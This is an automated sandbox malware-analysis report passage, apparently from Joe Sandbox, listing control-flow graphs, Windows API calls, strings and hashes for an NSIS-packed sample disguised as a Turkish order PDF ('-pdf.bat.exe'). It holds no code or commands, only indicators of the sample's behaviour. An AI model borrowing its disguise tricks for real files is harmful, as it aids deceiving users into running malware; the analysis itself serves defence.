5947->5948 5949 404560 GetDlgItem 5947->5949 5956 404262 8 API calls 5948->5956 5952 4045e1 5949->5952 5953 40457a 5949->5953 5950->5947 5950->5948 5954 404527 GetDlgItem SendMessageW 
5950->5954 5955 404439 5951->5955 5952->5948 5959 4045f3 5952->5959 5953->5952 5958 4045a0 SendMessageW LoadCursorW SetCursor 5953->5958 5978 40421d KiUserCallbackDispatcher 5954->5978 5961 4041fb 18 API calls 5955->5961 5957 40461b 5956->5957 5979 404669 5958->5979 5963 404609 5959->5963 5964 4045f9 SendMessageW 5959->5964 5966 404446 CheckDlgButton 5961->5966 5963->5957 5968 40460f SendMessageW 5963->5968 5964->5963 5965 404551 5969 404645 SendMessageW 5965->5969 5976 40421d KiUserCallbackDispatcher 5966->5976 5968->5957 5969->5947 5971 404464 GetDlgItem 5977 404230 SendMessageW 5971->5977 5973 40447a SendMessageW 5974 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5973->5974 5975 404497 GetSysColor 5973->5975 5974->5957 5975->5974 5976->5971 5977->5973 5978->5965 5982 4058b0 ShellExecuteExW 5979->5982 5981 4045cf LoadCursorW SetCursor 5981->5952 5982->5981 5983 40283b 5984 402843 5983->5984 5985 402847 FindNextFileW 5984->5985 5986 402859 5984->5986 5985->5986 5987 4029e6 5986->5987 5989 406284 lstrcpynW 5986->5989 5989->5987

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 0040337C
• GetVersion.KERNEL32 ref: 00403382
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
• OleInitialize.OLE32(00000000), ref: 004033F9
• SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
• GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000020,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
• OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
• ExitProcess.KERNEL32 ref: 004036EE
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
• DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
• CopyFileW.KERNEL32(C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
• CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
• GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
• OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow$C:\Users\user\Desktop$C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 3441113951-1489103699
                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: {$6B
                                                                  • API String ID: 590372296-3705917127
                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059BF
                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A07
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A30
                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A40
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00405996
                                                                  • \*.*, xrefs: 00405A01
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-4258389565
                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D2
                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: 8gB
                                                                  • API String ID: 2295610775-1733800166
                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: 6B
                                                                  • API String ID: 3282139019-4127139157
                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 304 4039d9-4039ea call 406152 298->304 305 4039ef-4039f5 lstrcatW 298->305 308 4039fa-403a23 call 403c4a call 405c61 299->308 304->305 305->308 313 403ab5-403abd call 405c61 308->313 314 403a29-403a2e 308->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 316 403a34-403a5c call 406152 314->316 316->313 322 403a5e-403a62 316->322 324 403b71-403b79 call 40140b 320->324 325 403af2-403b22 RegisterClassW 320->325 321->320 326 403a74-403a80 lstrlenW 322->326 327 403a64-403a71 call 405b86 322->327 338 403b83-403b8e call 403c4a 324->338 339 403b7b-403b7e 324->339 328 403c40 325->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 325->329 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->324 333->334 337 403a92-403a9c GetFileAttributesW 333->337 334->313 341 403aa2-403aa3 call 405ba5 337->341 342 403a9e-403aa0 337->342 348 403b94-403bae ShowWindow call 4065ee 338->348 349 403c17-403c18 call 4053bf 338->349 339->332 341->334 342->334 342->341 354 403bb0-403bb5 call 4065ee 348->354 355 403bba-403bcc GetClassInfoW 348->355 353 403c1d-403c1f 349->353 356 403c21-403c27 353->356 357 403c39-403c3b call 40140b 353->357 354->355 360 403be4-403c07 DialogBoxParamW call 40140b 355->360 361 403bce-403bde GetClassInfoW RegisterClassW 355->361 356->339 362 403c2d-403c34 call 40140b 356->362 357->328 366 403c0c-403c15 call 4038c4 360->366 361->360 362->339 366->332
                                                                  APIs
                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000), ref: 004039F5
                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
